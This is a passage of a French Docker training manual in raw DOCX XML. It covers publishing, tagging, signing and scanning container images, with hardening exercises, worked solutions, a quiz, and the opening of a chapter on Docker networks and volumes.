      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une vulnérabilité sans correctif disponible ne se traite pas en mettant à jour : il faut réduire l'exposition, isoler le service ou remplacer le composant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>63.5 Publier et versionner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une image se publie dans un registre, étiquetée par version, et accompagnée d'informations de provenance. Les étiquettes mobiles (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>latest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) ne doivent jamais être utilisées en production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Cinq commandes de publication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Étiqueter et pousser</w:t>
        <w:br/>
        <w:t>docker tag app:1.4.2 registry.exemple.fr/equipe/app:1.4.2</w:t>
        <w:br/>
        <w:t>docker tag app:1.4.2 registry.exemple.fr/equipe/app:1.4</w:t>
        <w:br/>
        <w:t>docker push registry.exemple.fr/equipe/app:1.4.2</w:t>
        <w:br/>
        <w:t>docker push registry.exemple.fr/equipe/app:1.4</w:t>
        <w:br/>
        <w:br/>
        <w:t># Authentification</w:t>
        <w:br/>
        <w:t>docker login registry.exemple.fr</w:t>
        <w:br/>
        <w:br/>
        <w:t># Signature (cosign)</w:t>
        <w:br/>
        <w:t>cosign sign --key cosign.key registry.exemple.fr/equipe/app:1.4.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.229 — Cinq conventions d'étiquetage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53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Étiquette</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="323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Signification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="323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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2535"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1.4.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3239"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Version exacte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3239"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Production</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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1.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="323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Dernière 1.4.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="323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Commodité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2535"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>latest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3239"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dernière publiée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3239"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Jamais en production</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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sha-a1b2c3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="323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Commit source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="323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Traçabilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2535"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>main</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3239"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dernière de la branche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3239"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Test</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GUIDE DE CONSTRUCTION D'IMAGE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Image de base épinglée par empreinte.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Aucun secret dans les couches.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Utilisateur non privilégié.</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Analyse de vulnérabilités dans la CI.</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Étiquette de version immuable et signature.</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image reproductible épingle base et dépendances.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L'empreinte identifie un contenu, l'étiquette peut être déplacée.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Multi-étapes et base minimale réduisent taille et surface d'attaque.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Le nettoyage doit se faire dans la même couche </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>RUN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w: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conteneur doit tourner avec un utilisateur non privilégié.</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socket Docker monté est une évasion de privilèges.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L'analyse de vulnérabilités doit être automatisée.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version de production est immuable et signée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les images sont propres. Le chapitre suivant les relie entre elles : réseaux et volumes.</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63.1 — Réduire une image de 1,2 Go</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Une image Node embarque les sources et les outils de construction.</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Passez en multi-étapes.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Choisissez une base minimale.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la taille.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 63.2 — Restreindre l'exécution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   SÉCURITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le service doit tourner sans droits particuliers.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Utilisateur non privilégié.</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Système de fichiers en lecture seule.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Suppression des capacités.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 63.3 — Traiter une vulnérabilité critique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   SÉCURITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'analyse signale une CVE critique dans la bibliothèque TLS.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Identifiez le paquet.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Mettez à jour la base.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et republiez.</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63.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>FROM node:22.9.0-alpine AS build</w:t>
        <w:br/>
        <w:t>WORKDIR /app</w:t>
        <w:br/>
        <w:t>COPY package*.json ./</w:t>
        <w:br/>
        <w:t>RUN npm ci</w:t>
        <w:br/>
        <w:t>COPY . .</w:t>
        <w:br/>
        <w:t>RUN npm run build</w:t>
        <w:br/>
        <w:br/>
        <w:t>FROM node:22.9.0-alpine</w:t>
        <w:br/>
        <w:t>WORKDIR /app</w:t>
        <w:br/>
        <w:t>ENV NODE_ENV=production</w:t>
        <w:br/>
        <w:t>COPY package*.json ./</w:t>
        <w:br/>
        <w:t>RUN npm ci --omit=dev &amp;&amp; npm cache clean --force</w:t>
        <w:br/>
        <w:t>COPY --from=build /app/dist ./dist</w:t>
        <w:br/>
        <w:t>USER node</w:t>
        <w:br/>
        <w:t>CMD ["node", "dist/server.js"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'image finale ne contient que les dépendances d'exécution et l'artefact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>npm cache clean --force</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dans la même couche évite de conserver le cache de téléchargement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 63.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>docker run -d \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --name app \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --user 10001:10001 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --read-only \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --tmpfs /tmp:rw,size=64m \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --cap-drop ALL \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --security-opt no-new-privileges \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -p 8080:3000 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  registry.exemple.fr/equipe/app:1.4.2</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier</w:t>
        <w:br/>
        <w:t>docker inspect app --format '{{.Config.User}} {{.HostConfig.ReadonlyRootfs}}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un service qui écrit dans son répertoire courant échouera : c'est justement ce que la restriction révèle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--tmpfs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> fournit un espace d'écriture éphémère pour les fichiers temporaires.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 63.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>trivy image --severity CRITICAL app:1.4.2</w:t>
        <w:br/>
        <w:br/>
        <w:t># Mise à jour de l'image de base</w:t>
        <w:br/>
        <w:t>docker pull node:22.9.0-alpine3.20</w:t>
        <w:br/>
        <w:t>docker build --no-cache -t app:1.4.3 .</w:t>
        <w:br/>
        <w:t>trivy image --severity CRITICAL app:1.4.3</w:t>
        <w:br/>
        <w:br/>
        <w:t># Publier seulement si l'analyse est propre</w:t>
        <w:br/>
        <w:t>docker push registry.exemple.fr/equipe/app:1.4.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--no-cache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> garantit que la nouvelle base est réellement utilisée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La publication conditionnée à une analyse propre empêche la réintroduction du défaut.</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Pourquoi épingler une image par empreinte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Pour accélérer le téléchargement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Parce qu'une étiquette peut changer</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Pour réduire la taille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Pour signer l'image</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Où doivent se faire le nettoyage des caches de paquets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Dans une couche séparée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 xml:space="preserve">Dans la même couche </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>RUN</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Après la construction</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Dans un volume</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 xml:space="preserve">Pourquoi éviter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--user root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en production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C'est plus lent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Une faille applicative donne des droits élevés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Cela empêche les logs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C'est obsolète</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 permet de faire un socket Docker monté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Lire les logs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Créer des conteneurs privilégiés sur l'hôte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Accélérer les builds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Partager des volumes</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Quelle étiquette ne doit jamais servir en production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1.4.2</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1.4</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sha-a1b2c3</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latest</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Seule l'empreinte garantit un contenu identique dans le temps.</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Une suppression dans une autre couche ne réduit pas la taille finale.</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Le principe du moindre privilège limite l'impact d'une compromission.</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C'est une évasion de privilèges : à éviter absolument.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5. D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>latest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> n'est pas immuable et peut pointer vers un contenu inconnu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>64. Réseaux et volumes Docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Relier des conteneurs entre eux et conserver des données hors du cycle de vie d'un conteneur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 63</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Choisir un pilote réseau adapté.</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Résoudre des conteneurs par leur nom.</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Distinguer volume, montage de bind et tmpfs.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Sauvegarder et restaurer un volume.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Diagnostiquer un conteneur qui ne joint pas un autre.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>64.1 Cinq pilotes réseau</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker crée un réseau par défaut pour chaque projet, mais les pilotes intégrés couvrent des besoins distincts. Le réseau </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>bridge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> par défaut, lui, n'offre pas la résolution par nom : c'est un piège classique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.230 — Cinq pilotes réseau</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193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Pilote</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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Portée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="206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Résolution DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="270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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
